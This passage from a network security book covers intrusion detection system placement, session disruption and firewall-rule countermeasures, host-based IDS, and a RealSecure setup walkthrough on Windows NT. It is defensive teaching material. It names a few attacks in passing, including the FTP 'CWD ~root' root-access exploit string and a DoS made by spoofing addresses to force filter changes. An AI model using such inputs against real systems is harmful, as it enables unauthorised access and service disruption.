access to network resources. This means that all attacks \nlaunched while the IDS is offline will go undocumented. \n \nAgain, this problem is not as insurmountable as the Secure Network study would make it seem. There is no \nlegitimate reason to have the intrusion detection system directly addressable by every network host. The act of \nsniffing network traffic does not require a valid IP address. The only systems requiring connectivity are \nƒ \nThe sensor \nƒ \nThe console \nƒ \nA DNS system (if you wish to resolve IP addresses to host names) \nƒ \nThe firewall or router (if you wish to let the IDS modify filtering rules) \nSegregating IDS communications from the public network can easily be accomplished using a separate private \nnetwork along with private IP address space. In fact, it can even be done in-band, as long as routing to this subnet \nis disabled. While the sensor requires an IP protocol stack and thus an IP address on the main network, there is no \nreason why this address has to be valid. An example of this configuration is shown in Figure 8.2. \n \nFigure 8.2: Managing IDS through a separate subnet \n" }, { "page_number": 172, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 172\nIn Figure 8.2, your regular network systems have been assigned address space from the 10.1.1.0 subnet. All \nsystems within this subnet are allowed some level of Internet access, and your firewall has been configured to use \nNAT with these addresses. As far as the firewall is concerned, only the 10.1.1.0 network exists internally. \nIf you look closely at the figure, you will notice that the DNS system has two IP addresses: one for the 10.1.1.0 \nnetwork and one for the 192.168.1.0 network. This device has been specifically configured not to route any traffic \nbetween these two subnets. IP forwarding has been disabled: while it is able to communicate with systems on both \nsubnets, it is unable to act as a router and forward traffic between them. \nYour IDS sensor and monitor are using address space from the 192.168.1.0 subnet. While they will be able to \ncommunicate with each other and the DNS system, they will not be able to communicate with any system using a \n10.1.1.0 address. This is because there are no devices routing between the two network segments. Your IDS is also \nunable to send to or receive any data from systems outside the firewall. \nWhat happens when your IDS sensor tries to monitor traffic? As mentioned, the IDS sensor will capture all traffic \non the network, not just traffic on its own subnet. This means that it is perfectly capable of recording all traffic on \nthe local network, including communications between systems on the 10.1.1.0 subnet and the Internet. It can then \nreport these findings to the console via the 192.168.1.0 subnet. \nWhat happens when either system needs to resolve an IP address to a host name? We did, after all, mention that \nthe DNS system was incapable of routing information. While this is a true statement, it does not prohibit you from \nusing the DNS system as a proxy in order to resolve address queries. \nIn Chapter 3, you saw that DNS is simply an application layer service that is responsible for translating host names \nto IP addresses and vice versa. When your sensor sends a DNS query to the DNS server, it will attempt to respond \nto the request with information stored locally (either through local domain files or via cached entries). If this is not \npossible, the DNS server will attempt to contact one of the root name servers. \nIf the best route to the root name server has been configured to be through the 10.1.1.15 IP address, such as by \ncreating a default route that points to 10.1.1.1 on the firewall, the DNS server will transmit the request using the \nsource IP address 10.1.1.15. The DNS server is not routing your query; it is acting as a proxy in order to resolve \nthe query for you. \nWhen it receives a reply to the query, the DNS server will then forward the response back to the sensor using the \nbest route it knows. This would require the system to transmit using the 192.168.1.1 address. Again, the \ninformation is not being routed; it is being proxied by the DNS service. This means that your IDS is fully capable \nof resolving DNS queries without using the same subnet address as the rest of the network. \nThe result is a hidden subnet that is not directly addressable from the Internet. An attacker would need to penetrate \nthe firewall and compromise the DNS server in order to gain connectivity to either the IDS sensor or console. If \nthe IDS cannot be directly addressed, it obviously cannot be attacked. \nTip \nJust like a firewall, an IDS sensor that will be using IP on the public network should be \nhardened before use. This includes insuring that it has all the latest security patches \ninstalled and that the system is not running any unnecessary services. A hardened system \nwill be far more resistant to attack—and therefore a much better platform for running a \nsecurity monitoring process. \nIDS Countermeasures \nAlong with logging and alerting, an intrusion detection system has two other active countermeasures at its \ndisposal: \nƒ \nSession disruption \nƒ \nFilter rule manipulation \nThese vary with each specific product, but let’s look at the general strengths and weaknesses of each method. \nInternal Attacks against the IDS \nThe IDS sensor and console are vulnerable to internal attack, however. If someone on the 10.1.1.0 network \ndiscovers the IP address of the IDS, it would be a simple matter of changing or spoofing the local address in order \nto address these systems directly on the 192.168.1.0 subnet. This is referred to as \"security through obscurity\"—\nthe systems will only remain secure as long as no one knows where they are hidden. Still, by making these \nsystems completely inaccessible from the Internet, you have dramatically limited the scope of potential attack \norigination points and simplified the process of discovering the attacker. \nWhen internal attacks are a concern, you can go with an IDS that does not require an IP stack. For example, \nRealSecure supports network monitoring from a system that does not have IP bound to the monitored network. \nWith no IP address, the system is invulnerable to any form of IP-based attack. Of course, this also means that you \nwill have to make special considerations for the monitoring console. You will either need to run the IDS console \n" }, { "page_number": 173, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 173\non the same system as the sensor or install a second network card in the sensor so that it can communicate with the \nconsole through a private subnet. \n \nSession Disruption \nSession disruption is the easiest kind of countermeasure to implement. While there are some variations on its \nimplementation, in its most basic form session disruption is produced by having the IDS reset or close each end of \nan attack session. This may not prevent the attacker from launching further attacks, but it does prevent the attacker \nfrom causing any further damage during the current session. \nFor example, let’s say that your IDS sensor detects a would-be attacker attempting to send the character string \nCWD ~root during an FTP session. If formulated correctly, this exploit would provide the attacker with root-level \nFTP access on some older systems. This level of access is granted without any password authentication, and the \nattacker would now be able to read or write to any file on the system. \nIf session disruption is enabled, your IDS sensor would first identify and log this potential attack, then spoof \nACK-FIN packets to both ends of the session in order to tear down the connection. The IDS sensor would do this, \npretending to be the system on the other end of the connection. For example, it would transmit an ACK-FIN to the \nattacker using the source IP address, port numbers, and sequence numbers of the FTP server. This would \neffectively close the communication session, preventing the attacker from accessing the file system. Depending on \nthe IDS sensor in use, it may then attempt to block all communications from the attacking host indefinitely or for a \nuser-configurable period of time. \nWhile session disruption is a powerful feature, it is not without its limitations. For example, the teardrop example \ngiven earlier in this chapter showed that the intrusion detection system would be unable to block the attack. While \nthe IDS has enough time to react to the FTP exploit, it could never react quickly enough to save a system from \nteardrop if only one malformed IP header is enough to crash the system. \nFilter Rule Manipulation \nSome IDS sensors have the ability to modify the filter rules of a router or firewall in order to prevent continued \nattacks. This stops the attacking system from transmitting additional traffic to the target host; the IDS adds a new \nfilter rule to the firewall that blocks all inbound traffic from the suspect IP address. While filter rule manipulation \nis a powerful novelty, it is not without its limitations. You should fully understand the implications of this feature \nbefore you enable it. \nOn the positive side, filter rule manipulation can prevent an attack with far less network traffic than session \ndisruption. Once the IDS modifies the filter rules, attack traffic ceases. With session disruption, the IDS must \ncontinually attempt to close every attack session. If you have a persistent attacker, this could add quite a bit of \nextra traffic to the wire. \nOn the negative side, filter rule manipulation is not always 100 percent effective. For example, what if the source \nIP address of the attack is inside the firewall? In this case, modifying the filter rules will have no effect. Since the \nattacking traffic never actually passes through the firewall, it is not subject to the filter rules. This means that a \nfilter change will have no effect on the attack. \nAlso, a savvy attacker may use a spoofed IP address rather than a real one. While the firewall may begin blocking \nthe initial attack, all the attacker has to do is select another spoofed address in order to circumvent this new rule \nchange. With session disruption, the IDS reacts based on attack signature, not source IP address. This means that \nsession disruption would be able to continually fend off the attack, while filter rule manipulation would not. The \nIDS could make successive rule changes, thus attempting to block all spoofed addresses as they are detected. If the \nattacker quickly varies the source IP address, however, the IDS would never be able to keep up. Remember that it \ntakes a certain amount of time (typically 10–30 seconds) for the IDS and the firewall to complete the filter change. \nWarning \nThe ability to perform live filter rule changes could be exploited for a DoS attack. If \nthe attacker purposely varies the source IP address in order to trigger multiple filter \nrule changes, the firewall may become so busy that it stops passing traffic. Any active \nsessions during the filter rule change may be terminated, as well. \nClearly, the ability to modify filter rules should be used sparingly and only for attacks that would be considered \nextremely detrimental. For example, just about every unpatched IP device or system produced before 1996 is \nvulnerable to the Ping of death, an exploit that breaks the IP protocol stack on a target system by sending it an \noversized ICMP datagram. If you are running an environment with many older systems that have not been \n" }, { "page_number": 174, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 174\npatched, modifying the filter rules to block these attacks makes a lot of sense. While frequent rule changes could \npotentially cause a Denial of Service, letting this traffic onto your network most certainly would interrupt all IP \ncommunications. \nTip \nThe Ping of death affects networking hardware as well as computer systems. Make sure that \nall of your IP devices are patched against this form of attack. \nNote \nNot all intrusion detection systems are compatible with all firewalls and routers. \nFor example, ISS RealSecure can only modify Check Point FireWall-1. At the \ntime of this writing, it is not compatible with any other firewall product, although \nthere are plans to add Cisco routers to a future release. So, while session \ndisruption can be used by any IDS that supports this feature, you can only use \nfilter manipulation if you are using a compatible system that performs firewall \nfunctions. \n \nHost-Based IDS \nUntil now we have focused on intrusion detection systems that run on a dedicated server and monitor all passing \nnetwork traffic. These devices are used to control traffic within an entire collision domain. There are, however, \nhost-based IDS products, which are designed to protect only a single system. \nHost-based IDS functions similarly to a virus scanner. The software runs as a background process on the system \nyou wish to protect as it attempts to detect suspicious activity. Suspicious activity can include an attempt to pass \nunknown commands though an HTTP request or even modification to the file system. When suspicious activity is \ndetected, the IDS can then attempt to terminate the attacking session and send an alert to the system administrator. \nSome Drawbacks \nHost-based intrusion detection systems have quite a few drawbacks, which make them impractical for many \nenvironments. For starters, most can monitor only specific types of systems. For example, CyberCop Server by \nNetwork Associates is only capable of protecting Web servers. If the server is running multiple services (such as \nDNS, file sharing, POP3, and so on), the host-based IDS system may not be able to detect an intrusion. While \nmost do watch core server functions, such as modifications to a user’s access rights, an attacker may find a way to \ndisable the IDS before attempting any changes to the system. If the IDS becomes disabled, the attacker is free to \nwreak havoc on the system. \nAnother problem is that host-based intrusion detection systems simply run as a background process and do not \nhave access to the core communication functionality of the system. This means that the IDS is incapable of \nfending off attacks against the protocol stack itself. For example, it takes 10 or more teardrop packets to crash an \nunpatched NT server. While this is more than ample time for a network-based IDS to react and take \ncountermeasures, a host-based IDS would be left helpless because it would never even see this traffic. \nIt can also be argued that there is a logistical flaw in running your intrusion detection software on the system you \nwish to protect. If an attacker can infiltrate the system, the attacker may compromise the IDS, as well. This is an \nextremely bad thing: the attacker has just punched through your last line of security defense. \nTip \nOnly sloppy attackers fail to clean up after themselves by not purging logs and suspected \nprocesses. This is why many security experts suggest that system administrators forward all \nlog entries to a remote system. If the system is compromised by an attacker, the logs cannot \nbe altered. This same principle should be extended to your intrusion detection systems, as \nwell. \nWhen Is Host-Based IDS Effective? \nDespite all these drawbacks, host-based intrusion detection systems do have their place. For example, let’s assume \nyou have a Web server you wish to protect that is located on a DMZ network segment. This DMZ is behind your \nfirewall but in an isolated segment that only contains the Web server. The firewall is configured to only allow in \nHTTP traffic to the Web server. \nIn this situation, a host-based IDS product may be sufficient to protect the Web server, because the firewall is \nproviding most of your protection. The firewall should insure that the only traffic allowed to reach the Web server \nis HTTP requests. This means that you should not have to worry about any other services being compromised on \nthe Web server. \n" }, { "page_number": 175, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 175\nYour host-based intrusion detection system only has to insure that no suspect file access requests or CGI and Java \nexploits are included in these HTTP requests and passed along to the Web server process running on the system. \nWhile this is still no small feat, it does limit the scope of the kinds of exploits the IDS will be expected to handle. \nHost-based IDS can also be extremely useful in a fully switched environment. The reasoning behind this is shown \nin Figure 8.3. In this figure, all systems are directly connected to a backbone switch. This, in effect, gives every \nsystem its own collision domain: the switch will isolate all unicast traffic so that only the two systems involved in \nthe communication will see the traffic. \n \nFigure 8.3: A network-based IDS is incapable of seeing all traffic in a fully switched environment. \nSince the switch is isolating communication sessions, your network-based IDS will be unable to see all of the \npassing network traffic. If a workstation launches an attack against the intranet Web server, the IDS will be \ncompletely unaware that the attack is taking place and thus unable to take countermeasures. This also means that \nthe attack would not appear in the IDS logs, so no record will be made of the event. \nA host-based IDS would be in a much better position to protect the intranet Web server. Since it runs on the \nsystem you wish to protect, it is unaffected by the traffic isolation properties of the switch. It will see all the traffic \nthat the Web server sees, so it can protect the system from HTTP-based attacks. \nTip \nMost switch vendors allow you to configure one of the switch’s ports as a monitoring port. \nThis allows the switch to send a copy of all passing traffic to any system connected to this \nport. If you will be using a network-based IDS in a switched environment, connect it to this \nmonitoring port in order to insure that the IDS can verify all passing traffic. \n \nIDS Fusion \nIn an attempt to not only overcome the limitations of traditional IDS, but also allow for more \nproactive defense, IDS research is pushing toward the integration—or to use the more \ncommon term of military origin, the fusion—of data. By combining the packet information (the \nactual information being communicated) from servers and hosts, along with information of \nother types and sources, IDS systems can more accurately determine information about an \nattack. Additional data sources include: \nSNMP Simple Network Management Protocol enables network devices to communicate \nwith a centralized monitoring system and report how they are operating, not just what data is \nbeing transferred. An example would be a router that updates a network monitoring system \nwith the amount of traffic per second passing through a given interface, (which can be used \nby IDS to determine if a hacker is attempting a DoS attack). \nSystem logs Most operating systems can be configured to record an extensive amount of \ndetail concerning their overall state at any given moment, along with the specifics from each \noperating system component. Consider an e-mail server that logs not just the arrival time of \ne-mail, but also the IP address of the originating server. This information could be used by \nIDS to trace the path of worm-carrying e-mails and to tell all e-mail servers in a system to \nfilter out any e-mail originating from the offending server. \nSystem messages While most pertinent system data is usually logged, this is not always \nthe case—either through the fault of misconfiguration or simply because of an operating \nsystem weakness. IDS uses system messages to create a greater overall picture of an \nentire network, which allows for combing the data (fusion) and retrieving meaning (pattern \nanalysis) from the network’s state. \n" }, { "page_number": 176, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 176\nCommands Most operating systems are not designed or configured to record every single \ncommand issued by all users. IDS fusion is designed to overcome just that limitation—\nilluminating patterns that might be missed by system logs themselves (which only report \ninformation of a direct system or security nature). An example would be a command \ndesigned to delete proprietary company information—though extremely damaging to an \norganization, does not violate or affect system integrity. \nUser Behavior A corollary to monitoring user commands, normal user behavior over time \ncreates its own patterns, and by constantly analyzing user account activity against that \naccount’s own profile, IDS systems can determine if that account has been hijacked—before \nany greater violation or penetration of systems has yet appeared. \nWhile the concept of analyzing all user, system, and network data and behavior seems \nstraightforward enough, in reality IDS fusion is very difficult; it relies on complicated \nmathematical formulas and requires some intense back-end resources to operate effectively—\nand even then it is still highly subjective and experimental. Nonetheless, IDS Fusion promises \nto revolutionize network defense through cooperative data-sharing and response by all \nnetworks affected by an attack. \nIDS Setup \nFor the purpose of discussing how you would set up an IDS, we will look at Internet Security Systems (ISS) \nRealSecure. RealSecure sensor is actually several separate products consisting of \nRealSecure Console (Workgroup Manager) controls the entire RealSecure system, including all \nnetwork and server sensors. Also stores the master database (used to generate reports). \nRealSecure Network Sensor records all network traffic on a given segment and compares it \nagainst attack signatures. \nRealSecure Server (OS) Sensor monitors system logs and interface traffic, looking for attacks \ndirected at a particular system. \nBefore You Begin \nFor this walk-through, we will focus on the Windows NT version of RealSecure. As mentioned, you can choose to \nrun the sensors and the console on the same system or on separate platforms (although you cannot run both the \nNetwork and Server/OS sensors on the same platform). The factors governing this decision are cost, performance, \nand whether or not you operate a switched network. The RealSecure software costs the same whether you want to \nuse one platform or two. For two platforms, however, you will obviously need to purchase two server-class \nsystems, as well as two Windows NT server licenses. \nIf the system will be monitoring a low-bandwidth connection (T1 speeds or less), you will probably be better off \nrunning a single “killer” machine rather than two lower-quality computers. If you plan to monitor a network \nbackbone or other high-traffic area, you may wish to consider purchasing two appropriately outfitted systems. \nReceiving and processing every packet on the wire takes a lot of CPU horsepower. RealSecure checks each packet \nfor more than 130 different suspect conditions. Combine this with making log entries and launching \ncountermeasures when required, and you have a very busy system. \nWhere to Place Your IDS \nIn order to decide where to best place your IDS, you must ask yourself, “Which systems do I wish to protect and \nfrom which sources?” It’s good to clarify this point up front—you may find you actually need more than one IDS \nsensor. You should have a solid security objective in mind before you fill out a purchase request for hardware or \nsoftware. \nOne potential deployment is shown in Figure 8.4. In this configuration, both the DMZ and the internal connection \nof the firewall are being monitored. This allows you to verify all inbound traffic from the Internet. It also allows \nyou to reinforce the existing firewall. Both IDS sensors are running without IP being bound to the public network \nsegment. IP is only running on a network card that connects the sensors back to the console. This allows your IDS \nsensors to be completely invisible to all systems on the public network segment. \n" }, { "page_number": 177, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 177\nThere are a few limitations to this configuration, however. First, you will be unable to monitor attack traffic from \nthe Internet that is targeted at the firewall. While your firewall should be capable of logging such activity, you may \nnot have the benefits of raw packet captures, dynamic filter rule manipulation, or any of the other features that an \nIDS can offer. If your link to the Internet is a T1 or less, and you want to monitor Internet traffic only, you may be \nbetter off buying one really good server and running all IDS functions outside the firewall. Since IP will not be \nneeded on this system, it should be safe from attack. \nAnother limitation of the design in Figure 8.4 is that it does not allow you to monitor any of the unicast traffic \ngenerated between internal systems. If your goal is to monitor all network traffic, you may wish to move your \ninternal IDS sensor to its own port on the switch and configure this switch port for monitoring. This would allow \nyou to see all traffic activity inside the firewall. \n \nFigure 8.4: A potential deployment of two IDS sensors \nIf your goal is to lock down the network as much as possible, you may wish to combine these solutions: placing \none IDS sensor outside the firewall and another IDS sensor off a monitoring switch port, and having both sensors \ncommunicate with the console through a private subnet. This would allow you to monitor all passing traffic within \nyour network while still maintaining control from a central console. \nOnce you have selected the areas you wish to monitor, you can select the number of IDS sensors required, as well \nas the appropriate hardware. \nHardware Requirements \nISS suggests the following minimum hardware requirements for the RealSecure Network Sensor \nƒ \nPentium II 300MHz processor \nƒ \n128MB of RAM \nƒ \n110MB of disk storage \nƒ \nAt least one PCI network card \nThe disk storage requirements are probably a bit light. If you will be monitoring a high-traffic area or if you think \nthat you may wish to capture a lot of raw data, plan to expand the amount of disk space accordingly. \nISS suggests the following minimum hardware requirements for the RealSecure console: \nƒ \nPentium II 300MHz processor \nƒ \n128MB of RAM (256 recommended) \n" }, { "page_number": 178, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 178\nƒ \n100MB of disk storage per sensor \nƒ \nOne PCI network card (an additional NIC can be used to create a secure network for \ncommunicating with sensors on remote machines) \nTip \nAgain, be generous with disk space. It is better to have too much than not enough. The more \ndisk space available, the longer you will be able to retain your logs. This is important if you \nwant to look at any long-term trends. If you will be running the sensor and the console on \nthe same system, consider increasing the processor requirements to a 400MHz Pentium II \nand the memory requirements to 192MB. \nInstalling NT \nRealSecure should be run on a Windows NT server that has been dedicated to IDS functions. \nWhen installing NT server, observe the following guidelines: \nƒ \nInstall all required network cards before loading NT. \nƒ \nCreate an NTFS C partition of 800MB, which will hold the NT operating system and swap \nfile. \nƒ \nCreate an NTFS D partition of the remaining drive space (200MB minimum) to hold the \nIDS program files and logs. \nƒ \nRemove all protocols except TCP/IP. \nƒ \nIn the Control Panel, open the Services dialog box and disable all services except the \nEvent Log service and the Net Logon service. \nƒ \nInstall the 128-bit version of Service Pack 5 (or greater). \nƒ \nAt a minimum, install the hotfixes getadmin-fix, ndis-fix, pent-fix, srvr-fix, and teardrop2-fix. \nOther hotfixes, such as scsi-fix, can be installed as you require. \nƒ \nUnder the Performance tab in System Properties, change the Boost to the foreground \napplication to None. \nƒ \nIf you are running the server service, go to the Server Properties dialog box and change \nOptimization to Maximize throughput for network applications. \nOnce you have followed these guidelines, you are ready to make an emergency recovery disk and install \nRealSecure. \nRealSecure Installation \nInstalling RealSecure is straightforward. You can download a demo of the various installation files if you contact \nISS via e-mail. The demo is simply a copy of the full product that will expire in 15 days. For more information, \nvisit the ISS Web site at \nwww.iss.net \nThe first component to install is the RealSecure Workgroup Manager (Console). The self-extracting executable \nwill start by copying some files to a temporary directory and launching the Setup program. If you do not have at \nleast Service Pack 5 installed (Service Pack 6a is preferred), the Setup program will warn you that it is required \nand terminate execution. \nAs shown in Figure 8.5, you are first asked to select which portions of the program you wish to install. You can \nchoose to install the console, restore private keys, or export the public keys of the console. Installing either the \nNetwork or OS/Server Sensors are separate installation procedures. The latter two options are useful after the IDS \nsoftware has been installed. These options are provided so that you can manage the encryption keys used by the \nconsole and the sensors when they are located on different systems. RealSecure uses a public/private key pair for \nall communications between the console and the sensor. Once you have made your selection, click Next. \n" }, { "page_number": 179, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 179\n \nFigure 8.5: The Select Install Options screen of the RealSecure installation \nYou will then be prompted to choose the destination for the RealSecure files. The default is to place them under \nthe Program Files directory on the C drive. It is strongly recommended that you change this path to D so that all \nRealSecure files are stored on their own partition. This will help to insure that system functionality is not affected \nif the log files grow large enough to fill the entire drive. Once you have specified a new path, click Next to \ncontinue. \nOnce you have selected a location for your files, if the system detects that you have not installed the high \nencryption version of a service pack, it will give you the following message: \n \nAfter you acknowledge the warning, you will be presented with the Select Cryptographic Setup screen as shown in \nFigure 8.6. This screen allows you to select a cryptographic services provider (CSP). The CSP is the component \nresponsible for encrypting and decrypting all traffic between the console and the sensors. The Microsoft Base \nCryptographic Provider is installed as part of Service Pack 3 or later, so it is available on all patched systems. If \nyou have a third-party CSP installed on the system, that should appear in this window, as well. \n \nFigure 8.6: The Cryptographic Setup screen \nYou should use the 128-bit version of Service Pack 6a if you wish to use strong encryption. If you have installed \nthe 40-bit version of any Service Pack, you will only be able to use weak encryption. If you select strong \nencryption with only the 40-bit version of any Service Pack installed, the installation utility will warn you that \nonly weak encryption can be used. Weak encryption is usually sufficient for use behind a firewall. If you will be \ncommunicating on a public network, however, you should seriously consider using strong encryption. As with \nstrong authentication, there is a slight performance degradation when you use strong instead of weak encryption. It \nis far more secure, however. \nAt this point, the installation utility will prompt you to name the program group and begin installing files to the \nsystem. Once this process is complete, you will be presented with the dialog box in Figure 8.7, which offers you \nthe opportunity to archive your private keys, (securing them with a pass-phrase in the process). \n" }, { "page_number": 180, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 180\n \nFigure 8.7: RealSecure can archive your private keys. \nAfter this screen, the system begins to copy files. Near the end of the copy process, the system will prompt you if \nit detects that you lack Microsoft’s Data Access Components (MDAC). You can choose to allow the system to \ninstall the components (required if you want RealSecure to function properly). \n \nAfter RealSecure installs the update MDAC (if required), the installation program prompts you to harden security \nby checking the permission levels set on the Registry keys and directories used by RealSecure. This is done in \norder to insure that they can only be accessed by the system administrator or an equivalent account. \n \nNote \nYou can only set directory permissions on an NT server if you have partitioned your \ndrives to use NTFS. \nNow the installation is complete. You will be prompted to reboot the server so that Registry changes can take \neffect and the IDS sensor service can start. The sensor starts automatically during system initialization, but the \nconsole must be launched from the RealSecure program group. Once the system restarts, copy your ISS.KEY file \nto the RealSecure program directory. \nConfiguring RealSecure \nTo launch the RealSecure console, select the RealSecure icon from within the RealSecure program group. This \nwill produce the screen shown in Figure 8.8. The top of your screen is the RealSecure menu. All functions are \navailable via pull-down menu options or from the toolbar. On the bottom of the screen is the Sensor view. This \nwindow displays all sensors that are currently being monitored. An unmonitored sensor will still collect data; it \nsimply cannot report this information back to the console. To select a console to monitor, click Sensor ¾ Monitor \nSensor from the Sensor menu. \n" }, { "page_number": 181, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 181\n \nFigure 8.8: The RealSecure Console screen \nTip \nIn order to see all the information screens, you should use a screen resolution of 800 x 600 \nor higher. \nSelecting Monitor Sensor will produce the Add Sensor dialog box. Use this box to select all the sensors you wish \nto monitor. If you have installed the console and the OS or Network Sensor on the same computer, you should see \nan entry for the localhost sensor. If the sensor is on a remote computer, you will need to click Add and fill in the \nIP address of the IDS sensor. Do this for each sensor on your network. Then highlight each sensor you want and \nclick OK to begin monitoring them. \nWhen the sensor appears on the Sensor View, you can right-click a particular sensor entry to produce a \nMaintenance menu. From this menu, select the Properties option in order to configure the specific characteristics \nof this sensor. If you have selected a Network Sensor, this will produce the Sensor Properties screen shown in \nFigure 8.9. \n \nFigure 8.9: The Policies tab of the Network Sensor screen \nThe Policies tab of the Network Sensor Properties screen allows you to customize the type of security policy your \nIDS will use. You can select the following options: \nWeb Watcher applies HTTP-based attack signatures to all Web traffic. \nDMZ Engine analyzes traffic inside of a DMZ (Demilitarized Zone), searching for attempts to \ncross the DMZ into the internal network. \nEngine Inside Firewall scans traffic on the internal network looking for anomalies. \nFor Windows Networks applies only Windows-based signatures to data on a network, optimizing \nthe IDS system by screening out all non-Windows data. \n" }, { "page_number": 182, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 182\nMaximum Coverage enables all signatures and all protocol profiles and sends all results to the \nconsole. While not a good idea on heavily used networks, this policy is good for evaluation \npurposes. \nProtocol Analyzer used to view the actual network data. No signatures are activated with this \npolicy—it is used primarily to give administrators an idea of the data flowing across a network. \nSession Recorder provides default connection information for NNTP, FTP, SMTP traffic. These \ndefaults are then modified to create a custom policy. \nAttack Detector only processes the most intense data; this policy does no decoding of network \ndata and doesn’t record regular connection information. \nNote \nRemember—the more verification the IDS sensor must perform, the more horsepower it \nis going to require. The different policies are designed to help you check for only the \nspecific vulnerabilities you need to worry about. \nOf course, no policy is ever going to be an exact fit. For this reason, you should consider using one of the policies \nas a template and customizing it to fit your needs. Instead of editing any of the default policies directly, you should \nhighlight the closest fit and click the Derive New Policy button. This will clone the policy you have highlighted \nand allow you to give it a name. Once you have completed this task, you can click Customize in order to critique \nthe settings. This will produce the Policy Editor window for your new custom policy. The Policy Editor allows \nyou to alter security and connection events, create user-defined events, and establish filters. As seen in Figure \n8.10, on the left side of the window is the tree view of a particular tab, on the upper right-hand side is a detailed \nlist, while the bottom right-hand section displays an explanation of whatever is selected on the left pane of the \nwindow. \n \nFigure 8.10: The Security Events tab of the Policy Editor screen allows you to customize your IDS policy \nsettings. \nThe Security Events tab allows you to configure which attacks your IDS should look for and what type of action \nshould be taken if a particular exploit is detected. The IDS sensor will look for every item that is checked off in the \nEnabled column. If you know for sure that you are immune to a particular type of exploit, you can conserve \nresources by not inspecting for it. For example, if none of your hosts is running Finger as a service, there should \nbe no need to check for any of the Finger exploits. \nTip \nIf you are ever unsure whether you need to worry about a particular exploit, online \nHelp has an excellent description of each exploit listed. If you are still unsure \nwhether you need to worry about a particular exploit, it is better to err on the side of \ncaution and let the IDS check for the vulnerability. \nThe Priority column allows you to select the level of urgency you wish to associate with each event. If you refer \nback to Figure 8.8, you will see that each of these priority levels is displayed in its own window. This allows you \nto quickly distinguish between traffic you wish to investigate later and traffic that requires your immediate \nattention. It also helps to sort these items for later reports. Regardless of the priority you set for an item, the \nDisplay box (under the Response column) must be checked in order to have detected events reported in one of the \nthree console windows. \nIf you click on the Response column, the Action dialog box shown in Figure 8.11 appears. From here you can \nselect how you want the IDS sensor to react when a specific event is detected. This can be as benign as simply \n" }, { "page_number": 183, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 183\nlogging the event or as reactive as killing the connection, modifying the firewall rules, and sending notification of \nthe event via e-mail or an SNMP trap message. You can even record the raw data of the packets in order to \ncompletely document the attack. \n \nFigure 8.11: The Response dialog box \nIf you click the Connection Events tab of the Policy Editor menu, you will be presented with a screen similar to \nthe one shown in Figure 8.12. Use the Connection Events screen when you require a bit more granularity. For \nexample, let’s assume you have a Web server sitting on a DMZ network. While you expect the Web server to \nreceive connections from the outside world, this system should never try to establish any kind of connection with \nany other system. If this occurs, it is possible that the Web server has been compromised by an attacker who is \nnow trying to probe or attack other systems. \n \nFigure 8.12: The Connection Events tab of the Policy Editor menu \nUsing the Connection Events settings, you can easily set up three policy rules to monitor all source traffic that \noriginates from your Web server. Three are required because you need to set up one rule for TCP, one rule for \nUDP, and another for ICMP. For the source address, use the IP address of the Web server. Set Destination \nAddress, Source Port, and Destination Port to Any, because you want to be informed of all traffic originating from \nthis system. \nNote \nThis is a powerful tool, which allows you to monitor more than just events that \nseem suspicious. The Connection Events settings can also be used to monitor \nspecific services, even if no exploits are detected. \nThe User-Specified Filters tab of the Edit Policy menu allows you to configure specific services or systems that \nthe IDS should not monitor. This is useful if you wish to insure that specific types of traffic are not recorded in the \nIDS logs. For example, you could filter out all HTTP traffic from your desktop system’s IP address so that your \npointy-haired boss does not find out just how much time you spend surfing the Dilbert Zone. (There may even be a \nfew useful security-related reasons for this feature.) \nFinally, the Filters tab lets you ignore any protocol, connection type, or traffic on your network. This is can be \nbeneficial, especially if you suspect a hacker is exploiting services beyond the common ones (DNS, FTP, HTTP, \netc.) By defining a comprehensive policy, and then ignoring the common protocols, unusual traffic patterns can \nstand out. \n" }, { "page_number": 184, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 184\nWhen you have finished editing your sensor policy, click OK to return to the Policies tab of the Sensor Properties \nscreen. You will be informed that you have made policy changes and that they need to be applied using the Apply \nto Sensor button. You can do this now or go on to the General tab to customize the sensor even further. \nThe General tab (oddly enough) displays general information about the sensor configuration. From here you can \nsee what software version the sensor is running and the system’s IP address. You can also view or change the port \nnumbers used to communicate with the console, which NIC the sensor is monitoring, and even the directory where \nthe RealSecure software is located. Typically, you will not need to change any of these settings. \nThe Alerts tab defines three levels of alerts that the sensor can write to the NT Event Log: Error, Warning, and \nInformative. Each level can be enabled or disabled, and if enabled, can be configured to notify the console and/or \nsend an SNMP trap to a third-party management system. The Encryption tab shows the current cryptographic \nprovider (the system used to encrypt communication between the sensor and the console) along with all available \nproviders. If you are configuring an OS sensor, the next tab is used to define connection and audit policy settings \nfor the sensor. And finally, the Event Log tab pulls all sensor entries from the NT Event log and displays them in \nthe window, allowing an administrator to quickly see how the sensor is interacting with the operating system, or if \nthe sensor itself is having a problem. \nWhile responses can be configured for each individual sensor policy, global responses can be used to simplify \nadministration. By selecting the Global Responses option under the View menu, you will be presented with the \nscreen shown in Figure 8.13. There are some important configuration options on this screen that you may wish to \nmodify. The most important is the RSKILL item, which displays the Tag RealSecure Kills check box. When this \nbox is checked, RealSecure adds information to all packets used for session disruption, which helps the person on \nthe other end detect the reason for the dropped connection. While the traffic would have to be inspected with \neither an analyzer or a tool specifically designed to look for this type of traffic, broadcasting that RealSecure \ndisrupted the connection may be more information than you wish to hand out. If you want your IDS sensor to be \ntruly invisible, you should deselect this option. \n \nFigure 8.13: The Responses tab of the Sensor Properties screen \nAlso on this tab are text boxes where you can enter the information required to use the associated action item. For \nexample, you must supply a mail gateway and a destination e-mail address if you wish to receive e-mail \nnotification of certain events. Other examples include the Lucent and Check Point firewalls. If you click on the \nLMF icon on the left pane of the window, the Lucent Firewall options are presented in the right pane, as shown in \nFigure 8.14. From this screen you can specify the IP address of the firewall that should be notified during certain \nevents and which key should be used to contact it. \n" }, { "page_number": 185, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 185\n 